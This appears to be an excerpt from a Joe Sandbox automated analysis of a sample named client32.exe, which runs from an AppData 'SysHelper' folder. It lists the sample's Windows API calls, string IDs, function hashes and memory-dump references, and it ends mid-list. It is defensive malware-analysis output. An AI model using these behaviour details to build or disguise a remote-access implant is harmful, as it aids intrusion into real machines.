                                                                                                                        • API ID: CountInitializeObjectSingleTickUninitializeWait$Event
                                                                                                                        • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                        • API String ID: 3357037191-4122679463
                                                                                                                        • Opcode ID: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
                                                                                                                        • Instruction ID: 79165456b83758217f0e3ba606bc8870e55e265f2da5a0662fe20fec16fd047e
                                                                                                                        • Opcode Fuzzy Hash: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
                                                                                                                        • Instruction Fuzzy Hash: B4F0A0B2E00218ABD700EBF99C89EAEBB9CDB4431CB100076F904C7245E9A2BD1047B2
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6859503D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                        • String ID: GetModuleFileNameExA
                                                                                                                        • API String ID: 4084229558-758377266
                                                                                                                        • Opcode ID: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
                                                                                                                        • Instruction ID: e23656c5dac0cf9fa05560afcc68164bbb297e952d00726f289e8e4ae625ec2a
                                                                                                                        • Opcode Fuzzy Hash: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
                                                                                                                        • Instruction Fuzzy Hash: 77F08272600218AFC720DF94E804E9B77A8EB48711F40451BFD45D7240C671F810CBF5
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
                                                                                                                        • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4
                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FED
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                        • String ID: EnumProcessModules
                                                                                                                        • API String ID: 3858832252-3735562946
                                                                                                                        • Opcode ID: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
                                                                                                                        • Instruction ID: c6008895448c7ea24cf5e3f5aa5c2c106650779afcf18f2532c2e3569412b958
                                                                                                                        • Opcode Fuzzy Hash: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
                                                                                                                        • Instruction Fuzzy Hash: 41F08C72650218AFCB20DFA8D844E9B77A8EB48721F40C81AFD6AD7740C670EC10CFA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                                        • String ID: *AutoICFConfig$Client
                                                                                                                        • API String ID: 3257255551-59951473
                                                                                                                        • Opcode ID: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
                                                                                                                        • Instruction ID: 999f83b1187bc70c22231b94e5d2b365f7563141598ae0e3e9d3e8eed503f9d2
                                                                                                                        • Opcode Fuzzy Hash: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
                                                                                                                        • Instruction Fuzzy Hash: B8E0D8347D02087AFB119AE19C86FA9F35D9744766F500750FB21A91C4EAA06440872D
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 1106FDC7
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                        • String ID: Push
                                                                                                                        • API String ID: 1566154052-4278761818
                                                                                                                        • Opcode ID: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                        • Instruction ID: f8492b55367a0abba2df78aab96abf65533029d7cee8b1effb3e7d26cba893d6
                                                                                                                        • Opcode Fuzzy Hash: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                        • Instruction Fuzzy Hash: F651DB75E00745DFE321CF64C8A4B86FBE9EF04714F4585AEE85A8B282D730B840CB92
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
                                                                                                                        • Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4212191310-0
                                                                                                                        • Opcode ID: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
                                                                                                                        • Instruction ID: 535f9a0d7001d5bb9c61b1ab5c8456b419707014113600a3913e4554816d070a
                                                                                                                        • Opcode Fuzzy Hash: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
                                                                                                                        • Instruction Fuzzy Hash: BC21AAB6E00650EFDF129F18C8456DEB7FAEF86315F824417DC65A3240D771A9408B66
                                                                                                                        APIs
                                                                                                                        • ioctlsocket.WSOCK32(97A234B3,4004667F,00000000,a3Zh), ref: 68595D1F
                                                                                                                        • select.WSOCK32(00000001,?,00000000,?,00000000,97A234B3,4004667F,00000000,a3Zh), ref: 68595D62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ioctlsocketselect
                                                                                                                        • String ID: a3Zh
                                                                                                                        • API String ID: 1457273030-2278443015
                                                                                                                        • Opcode ID: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
                                                                                                                        • Instruction ID: f4d72408498c597f28c5e98b0793ceec49d4e0105455f2fa7991f5df7ed328ba
                                                                                                                        • Opcode Fuzzy Hash: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
                                                                                                                        • Instruction Fuzzy Hash: 54210E71A003189BEB28DF14C9657EDB7B9EF88305F4081EAA80A97281DB745F94DF90
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SysHelper\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                                        • API String ID: 2251294070-1429985935
                                                                                                                        • Opcode ID: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                        • Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
                                                                                                                        • Opcode Fuzzy Hash: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                        • Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791
                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110151D8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                                        • String ID: \\.\NSWFPDrv
                                                                                                                        • API String ID: 3498533004-85019792
                                                                                                                        • Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                        • Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
                                                                                                                        • Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                        • Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _calloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1679841372-0
                                                                                                                        • Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                        • Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
                                                                                                                        • Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                        • Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 68598FE4
                                                                                                                        • getsockname.WSOCK32(?,?,00000010,?,02B42E90,?), ref: 68599005
                                                                                                                        • WSAGetLastError.WSOCK32(?,?,00000010,?,02B42E90,?), ref: 6859902E
                                                                                                                          • Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3066294524-0
                                                                                                                        • Opcode ID: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
                                                                                                                        • Instruction ID: b2f72d1da823fcf21a5055cfacb7210fa2dd74d042b233ef0eeefe23358ff26e
                                                                                                                        • Opcode Fuzzy Hash: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
                                                                                                                        • Instruction Fuzzy Hash: A4113076E00108AFCB40DFA9DC11AFFB7B8EF89214F41456AEC05E7240E770AE148B95
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                        • __wsplitpath.LIBCMT ref: 1110E405
                                                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryInformationSystemVolume__wsplitpath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 395646034-0
                                                                                                                        • Opcode ID: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
                                                                                                                        • Instruction ID: 49ee09b274793d3f37b85f9af0a235e2207b6666fb7fe841f2bc02eb00c982ac
                                                                                                                        • Opcode Fuzzy Hash: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
